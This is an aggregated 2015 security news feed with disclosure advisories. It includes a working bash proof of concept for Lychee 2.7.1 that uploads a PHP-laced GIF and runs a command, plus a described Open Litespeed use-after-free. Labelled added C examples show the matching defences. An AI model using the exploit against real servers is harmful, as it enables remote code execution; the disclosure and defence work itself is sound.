Channel: BOT24
Viewing all 8064 articles

'Geo-inference' can reveal your location in all mainstream browsers

Many of the world’s most popular websites and browsers are leaking your location, right down to your country, city, neighborhood, and home address, according to new research from the National University of Singapore.

A “geo-inference attack” allows virtually anyone with a website—even if they don’t have your permission—to narrow down a person’s country, city, and neighborhood by measuring the timing of browser cache queries related to increasingly ubiquitous geo-location services like Google and Craigslist.

more here........http://www.dailydot.com/crime/geo-inference-attack-google-craigslist-maps/

Minecraft Vulnerability Advisory

Flash EK Strikes Again via Google’s DoubleClick

Exploit kits (still) pushing Teslacrypt ransomware

Teslacrypt is a form of ransomware that was first noted in January of this year [1].  This malware apparently targets video game-related files [2, 3, 4].  I've seen Teslacrypt dropped by the Sweet Orange exploit kit (EK) [5], and it's also been dropped by Nuclear EK [6].  McAfee saw it dropped by Angler EK last month [2].

I saw it again on Wednesday 2015-04-15 from Nuclear EK.  Let's take a look at the traffic here....https://isc.sans.edu/diary/Exploit+kits+(still)+pushing+Teslacrypt+ransomware/19581

Lychee 2.7.1 remote code execution

Advisory ID: SGMA15-002
Title: Lychee remote code execution
Product: Lychee
Version: 2.7.1 and probably prior
Vendor: lychee.electerious.com
Vulnerability type: Remote Code Execution
Risk level: High
Credit: Filippo Cavallarin - segment.technology
CVE: N/A
Vendor notification: 2015-04-12
Vendor fix: 2015-04-13
Public disclosure: 2015-04-15


Details

Lychee version 2.7.1 and probably below suffers from a remote code execution vulnerability.

The vulnerability resides in the importUrl function, which fails to restrict file types because it does not
validate the file extension. Since the imported file is stored in a web-readable directory where PHP files can be
executed, remote code execution can be achieved.

Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a
specially crafted image file containing PHP code.

To exploit this vulnerability the attacker must be logged in as administrator.

The following proof of concept demonstrates the issue:

#!/bin/bash

LYCHEE_HOST="lychee.local"
PHPSESSID="e0ac560kmqf0lli9u5jd20qt46"
LOCALIP="172.16.85.1"
CMD="uname -a"

cd /tmp || exit 1

echo "Creating gif..."
# GIF89a header and screen descriptor, followed by a comment extension block (0x21 0xFE) holding the PHP code
GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php system('$CMD')?>"
echo -e "$GIF" > gif.php

echo "Starting local webserver"
# serve gif.php from /tmp on port 8000 so that the Lychee host can fetch it by URL
python -m SimpleHTTPServer > /dev/null 2>&1 &

sleep 1

echo "Starting the import procedure"
# importUrl keeps the remote file name, so the file lands in the web-readable data directory as gif.php
curl "http://$LYCHEE_HOST/php/api.php" -H "Cookie: PHPSESSID=$PHPSESSID" \
     --data "function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"

sleep 5

kill %1
rm gif.php

echo "Executing command.."
curl "http://$LYCHEE_HOST/data/gif.php"

#EOF


Solution

Upgrade to Lychee version 2.7.2
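The advisory points at two controls an import routine needs: the stored extension must come from the file's content rather than from the URL, and a file that passes the image check can still carry PHP code (the PoC hides it in a GIF comment block). The following is an added example, not Lychee's own code (Lychee is PHP; this is C for illustration). The function names, the "<id>.<ext>" naming scheme, the allowed-format table and the sample GIFs are assumptions and constructed inputs.

```c
/* Added example, not Lychee's own code (Lychee is PHP; this is C for
 * illustration). Function names and the "<id>.<ext>" naming scheme are
 * assumptions. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Extension to store the file under, chosen from magic bytes only.
 * Returns NULL when the content is not an allowed image format. */
const char *sniff_image_ext(const uint8_t *buf, size_t len)
{
    static const uint8_t png_magic[] = { 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A };

    if (len >= 6 && (memcmp(buf, "GIF87a", 6) == 0 || memcmp(buf, "GIF89a", 6) == 0))
        return "gif";
    if (len >= 8 && memcmp(buf, png_magic, 8) == 0)
        return "png";
    if (len >= 3 && buf[0] == 0xFF && buf[1] == 0xD8 && buf[2] == 0xFF)
        return "jpg";
    return NULL;
}

/* A valid image header proves nothing about the rest of the file: the
 * advisory's GIF hides "<?php ... ?>" in a comment extension block.
 * Returns 1 if a PHP open tag occurs anywhere in the bytes. */
int contains_php_tag(const uint8_t *buf, size_t len)
{
    static const char *const tags[] = { "<?php", "<?=" };
    for (size_t t = 0; t < 2; t++) {
        size_t tl = strlen(tags[t]);
        for (size_t i = 0; i + tl <= len; i++)
            if (memcmp(buf + i, tags[t], tl) == 0)
                return 1;
    }
    return 0;
}

/* Build the on-disk name from a server-generated base (e.g. a random hex id)
 * plus the sniffed extension. The URL's extension never reaches the result.
 * Returns 0 and fills `out` on success, -1 when the import must be refused. */
int safe_import_name(const uint8_t *buf, size_t len, const char *base,
                     char *out, size_t outsz)
{
    const char *ext = sniff_image_ext(buf, len);
    if (ext == NULL || contains_php_tag(buf, len))
        return -1;
    if (base[0] == '\0' || strpbrk(base, "/\\.") != NULL)   /* base must be a plain token */
        return -1;
    int n = snprintf(out, outsz, "%s.%s", base, ext);
    return (n > 0 && (size_t)n < outsz) ? 0 : -1;
}

/* Constructed samples: a minimal 1x1 GIF89a and the same GIF with a comment
 * extension (0x21 0xFE) carrying a PHP tag, mirroring the advisory's PoC.
 * Returns 1 when all three decisions come out as expected, 0 otherwise. */
int demo_import(void)
{
    static const uint8_t clean_gif[] = {
        'G','I','F','8','9','a', 0x01,0x00, 0x01,0x00, 0x80,0x00,0x00,
        0xFF,0xFF,0xFF, 0x00,0x00,0x00, 0x3B };
    static const uint8_t polyglot_gif[] = {
        'G','I','F','8','9','a', 0x01,0x00, 0x01,0x00, 0x80,0x00,0x00,
        0xFF,0xFF,0xFF, 0x00,0x00,0x00,
        0x21, 0xFE, 0x10, '<','?','p','h','p',' ','e','c','h','o',' ','1',';',' ','?','>', 0x00,
        0x3B };
    char name[64];

    /* clean image: accepted, and named by content, not by the remote URL */
    if (safe_import_name(clean_gif, sizeof clean_gif, "0a1b2c3d", name, sizeof name) != 0)
        return 0;
    if (strcmp(name, "0a1b2c3d.gif") != 0)
        return 0;
    /* polyglot: same magic bytes, but refused because of the embedded PHP tag */
    if (safe_import_name(polyglot_gif, sizeof polyglot_gif, "0a1b2c3d", name, sizeof name) != -1)
        return 0;
    /* non-image bytes: refused regardless of what the URL called the file */
    if (safe_import_name((const uint8_t *)"<?php", 5, "0a1b2c3d", name, sizeof name) != -1)
        return 0;
    return 1;
}

int main(void)
{
    printf("import checks %s\n", demo_import() ? "behave as expected" : "FAILED");
    return 0;
}
```

Content sniffing and the tag scan narrow the exposure, but the decisive control is the one the advisory describes: the file is never saved under an attacker-chosen extension, and the data directory is not served as executable PHP. Re-encoding the image through an image library before storing it removes comment blocks as well.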


References
http://lychee.electerious.com




Filippo Cavallarin
https://segment.technology/

Open Litespeed Use After Free Vulnerability

(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Open Litespeed Use After Free Vulnerability
Affected versions: Open Litespeed <= 1.3.9

PDF:
http://www.security-assessment.com/files/documents/advisory/Open%20Litespeed%20Use%20After%20Free%20Vulnerability.pdf

+-----------+
|Description|
+-----------+
A use after free vulnerability was discovered within the header parser
of the Open Litespeed web server. This vulnerability can be successfully
exploited to trigger an out of bounds memory read, resulting in a
segmentation fault crashing the web server.

+------------+
|Exploitation|
+------------+
By sending a crafted request, an attacker may trigger an out-of-bounds
memory read, crashing the web server. This is due to a portion of memory
being referenced by the application after being freed by a realloc() call.

The second parameter (p) to the memmove() call (line 741, httpreq.cpp)
within the HttpReq::newKeyValueBuf method results in an out of bounds
memory read when the attacker submits a crafted request containing a large
number of header rows. This is due to the portion of memory the 'p'
parameter resides in being freed by a realloc() call. The reallocation
is performed by the allocate() method of the AutoBuf class, which is
triggered by the call to AutoBuf's grow() method within the
newKeyValueBuf method (line 736, httpreq.cpp). The newKeyValueBuf method
snippet is detailed below, showing the call to AutoBuf::grow() and the
subsequent memmove() call:

 735         if ( m_reqBuf.available() < total )
 736             if ( m_reqBuf.grow( total ) )
 737                 return NULL;
 738         char * pNewBuf = m_reqBuf.end();
 739         m_reqBuf.used( total );
 740         if ( orgSize > 0 )
 741             memmove( pNewBuf, p, sizeof( int ) * 2 + sizeof( key_value_pair ) * orgSize );
 742         else
 743             *( ((int *)pNewBuf) + 1 ) = 0;
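The snippet above takes a pointer p into the request buffer, lets grow() reallocate that buffer, and then reads through p. The following is an added example, not Open Litespeed's code: a minimal growable buffer with the same shape, showing the stale-pointer copy next to a version that carries the source as an offset and recomputes the pointer after growing. The type and function names (autobuf_t, copy_region_unsafe, copy_region_safe) are illustrative stand-ins for AutoBuf and HttpReq::newKeyValueBuf, and the "key=val" row is a constructed input.

```c
/* Added example, not Open Litespeed's code. autobuf_t stands in for AutoBuf,
 * copy_region_* for the copy inside HttpReq::newKeyValueBuf; all names are
 * illustrative. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char  *data;   /* heap block; realloc() may move it */
    size_t used;
    size_t cap;
} autobuf_t;

int autobuf_init(autobuf_t *b, size_t cap)
{
    b->data = malloc(cap);
    if (b->data == NULL) return -1;
    b->used = 0;
    b->cap = cap;
    return 0;
}

size_t autobuf_available(const autobuf_t *b) { return b->cap - b->used; }

/* Stand-in for AutoBuf::grow(): ensure room for `need` more bytes.
 * When realloc() moves the block, every pointer derived from the old
 * b->data is dangling the moment this returns. */
int autobuf_grow(autobuf_t *b, size_t need)
{
    size_t newcap = b->cap ? b->cap : 16;
    while (newcap - b->used < need) newcap *= 2;
    char *nd = realloc(b->data, newcap);
    if (nd == NULL) return -1;
    b->data = nd;
    b->cap = newcap;
    return 0;
}

/* UNSAFE: the advisory's pattern. `src` points inside b->data, grow() may
 * free that block, and memmove() then reads memory that was just freed.
 * Kept for comparison only; nothing here calls it. */
int copy_region_unsafe(autobuf_t *b, const char *src, size_t n)
{
    if (autobuf_available(b) < n && autobuf_grow(b, n) != 0) return -1;
    char *dst = b->data + b->used;
    b->used += n;
    memmove(dst, src, n);   /* use-after-free when realloc() moved the block */
    return 0;
}

/* SAFE: carry the source as an offset across grow() and re-derive the
 * pointer from the current base afterwards. Also refuses sources that lie
 * outside the bytes actually written. */
int copy_region_safe(autobuf_t *b, size_t src_off, size_t n)
{
    if (src_off > b->used || n > b->used - src_off) return -1;
    if (autobuf_available(b) < n && autobuf_grow(b, n) != 0) return -1;
    char *dst = b->data + b->used;
    const char *src = b->data + src_off;   /* computed after grow(), so it is valid */
    b->used += n;
    memmove(dst, src, n);
    return 0;
}

/* Constructed sample: a 7-byte "header row" duplicated three times into a
 * buffer that starts with room for 8 bytes, so grow() must relocate it.
 * Returns the final number of bytes in use (28) or -1 on failure. */
int demo_duplicate(void)
{
    static const char row[] = "key=val";   /* 7 bytes, constructed input */
    autobuf_t b;
    if (autobuf_init(&b, 8) != 0) return -1;
    memcpy(b.data, row, 7);
    b.used = 7;
    for (int i = 0; i < 3; i++) {
        if (copy_region_safe(&b, 0, 7) != 0) { free(b.data); return -1; }
    }
    int ok = (b.used == 28) && memcmp(b.data + 21, row, 7) == 0;
    free(b.data);
    return ok ? 28 : -1;
}

/* The offset form also puts the bounds check in one place: a source range
 * that extends past the written bytes is refused. Returns 1 when refused. */
int demo_reject_out_of_range(void)
{
    autobuf_t b;
    if (autobuf_init(&b, 8) != 0) return -1;
    b.used = 4;
    int refused = (copy_region_safe(&b, 2, 5) == -1);   /* 2 + 5 > 4 bytes written */
    free(b.data);
    return refused;
}

int main(void)
{
    printf("bytes used after three safe copies: %d\n", demo_duplicate());
    printf("out-of-range source refused: %d\n", demo_reject_out_of_range());
    return 0;
}
```

Running the unsafe variant under AddressSanitizer is the quickest way to see the pattern flagged as a heap-use-after-free; the safe variant only ever touches the block that b->data currently points to.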

Further information is available in the advisory PDF. POC exploit code
can be found at
http://www.security-assessment.com/files/documents/advisory/openlitespeed-1.3.9-UAF-DOS.c



+----------+
| Solution |
+----------+
Update to the latest version of the Open Litespeed web server.

+-------------------+
|Disclosure Timeline|
+-------------------+
26/03/2015 - Advisory sent to Litespeed
27/03/2015 - Response from Litespeed stating the vulnerability will be
fixed in the next release of Open Litespeed
10/04/2015 - Open Litespeed 1.3.10 released
14/04/2015 - Advisory PDF released

+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+

Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.

Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings,
contact us:

Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650

PHP 5.6.8 is released

Reverse Engineered: Capcom CPS1 - Part 1

For most of the 80's, arcade titles were the product of intense hardware and software custom design work. With every new game title came a new board design and the full dedication of multiple specialized teams including experts in hardware, electronics, software, game design, graphics, sound... the list goes on and on.

Competition, faster release cycles, and the need for continued improved financial results, drove arcade manufacturers into operational optimization and standardization efforts with the ultimate goal of focusing into their true core business: producing successful video games, not hardware.

With the introduction in 1988 of the Capcom Play System 1 (CPS-1) by Capcom, the company signaled a new era in game design quality and hardware platform maturity.

more here.........http://arcadehacker.blogspot.com/2015/04/capcom-cps1-part-1.html

TECHNOLOGISTS OPPOSE CISA/INFORMATION SHARING BILLS

Today we sent a letter to lawmakers expressing security experts' opposition to the Cybersecurity Information Sharing Act (CISA) as well as two other pending bills that purport to be about security information sharing, the Protecting Cyber Networks Act (PCNA), and the National Cybersecurity Protection Advancement Act of 2015. These experts agree that the information sharing bills unnecessarily waive privacy rights because they focus on sharing information beyond that needed for cybersecurity.

more here........http://cyberlaw.stanford.edu/blog/2015/04/technologists-oppose-cisainformation-sharing-bills

Beyond annoyance: security risks of unwanted ad injectors

KASPERSKY RANSOMWARE DECRYPTOR

The National High Tech Crime Unit (NHTCU) of the Netherlands’ police, the Netherlands’ National Prosecutors Office and Kaspersky Lab have been working together to fight the CoinVault ransomware campaign. During our joint investigation we have been able to obtain data that can help you to decrypt the files being held hostage on your PC. We provide both decryption keys and the decryption application.

more here.........https://noransom.kaspersky.com/

CVE-2014-5370 - Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet

Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
CVE: CVE-2014-5370
Vendor: New Atlanta
Product: BlueDragon CFChart Servlet
Affected version: 7.1.1.17759
Fixed version: 7.1.1.18527
Reported by: Mike Westmacott
Details:

The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.


PITM

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE)

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE) and 173,132 emails, to and from more than 2,200 SPE email addresses.

more here......https://wikileaks.org/sony/press/

Apache Cassandra JMX/RMI Remote Code Execution & Cisco Cloud Web Security Connector JMX/RMI Remote Code Execution

Apache Cassandra was found to bind an unauthenticated JMX/RMI service on all network interfaces. An adversary with network access may abuse this service and achieve arbitrary remote code execution as the running user.

more here...........https://labs.mwrinfosecurity.com/advisories/2015/04/17/apache-cassandra-jmxrmi-remote-code-execution/


A vulnerability exists in Cisco Cloud Web Security Connector which allows unauthenticated users to gain unauthorised access with administrative privileges on the target host. Cisco confirmed this vulnerability and assigned CVE-2015-0689.

more here..........https://labs.mwrinfosecurity.com/advisories/2015/04/17/cisco-cloud-web-security-connector-jmxrmi-remote-code-execution/

MS15-034 Detection: Some Observations

MONITORING ZEUS P2P AND DYREZA WITH MALWARE LOFTS

Many malicious binaries use a command and control server centralised on a dedicated domain, which is simple to operate but likely to be shut down by specialised companies like Lexsi or LEAs. Malware authors have been using decentralised network infrastructures for a few years to ensure their botnet will be more resilient, implying the development of new tools to monitor their evolution. CERT-LEXSI is using “lofts” for that purpose, that is to say virtual machines specially configured to decrypt communications in real time and extract banking malware configuration files and look for newly targeted banks.

more here..........http://www.lexsi-leblog.com/cert-en/monitoring-zeus-p2p-dyreza-malware-lofts.html

Security expert pulled off flight by FBI after exposing airline tech vulnerabilities

One of the world’s foremost experts on counter-threat intelligence within the cybersecurity industry, who blew the whistle on vulnerabilities in airplane technology systems in a series of recent Fox News reports, has become the target of an FBI investigation himself.

Chris Roberts of the Colorado-based One World Labs, a security intelligence firm that identifies risks before they're exploited, said two FBI agents and two uniformed police officers pulled him off a United Airlines Boeing 737-800 commercial flight Wednesday night just after it landed in Syracuse, and spent the next four hours questioning him about cyberhacking of planes.

more here........http://www.foxnews.com/us/2015/04/17/security-expert-pulled-off-flight-by-fbi-after-exposing-airline-tech/

So, you won a regional and you’re headed to National CCDC

Match.com’s HTTP-only login page puts millions of passwords at risk
